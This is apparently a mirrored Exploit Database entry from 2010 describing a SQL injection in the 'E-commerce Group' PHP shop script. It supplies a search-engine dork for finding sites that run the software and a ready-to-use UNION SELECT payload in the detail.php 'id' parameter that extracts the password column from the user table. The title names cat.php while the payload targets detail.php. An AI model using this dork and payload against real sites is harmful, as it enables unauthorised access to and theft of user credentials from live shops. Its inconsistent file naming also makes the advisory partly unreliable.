E-Commerce Group – ‘cat.php’ SQL Injection

• Exploit Database
• 9 阅读

• 作者： BLack Revenge
  日期： 2010-05-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12696/

• Exploit Title: E-commerce Group (cat.php) SQL Injection Vulnerability
  # Date: 2010/05/21
  # Author:BLack Revenge
  # Software Link:
  # Version:
  # Tested on:
  # CVE :
  ==============================
  [#]E-commerce Group (cat.php) SQL Injection Vulnerability
  [#]Founder: BLaCk RevenGe
  Email:- ahmed.h4ck3r@gmail.com
  WwW.AraB-ExplOiT.CoM[#]
  AraB Expl0iT Cr3w
  -----------------------------------------------------------
  ==============================
  Dork :Designed and Developed by karkia <http://www.karkia.org/> E-commerce
  Group. Copyright 2007
  
  SQL Injection
  http://www.Site.com/path/detail.php?id=1 -->SQL Injection
  
  Demo:-
  Password Injection #
  
  http://www.localhost.com/shop/detail.php?id=-647+union+select+1,2,3,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user
  ----------------------------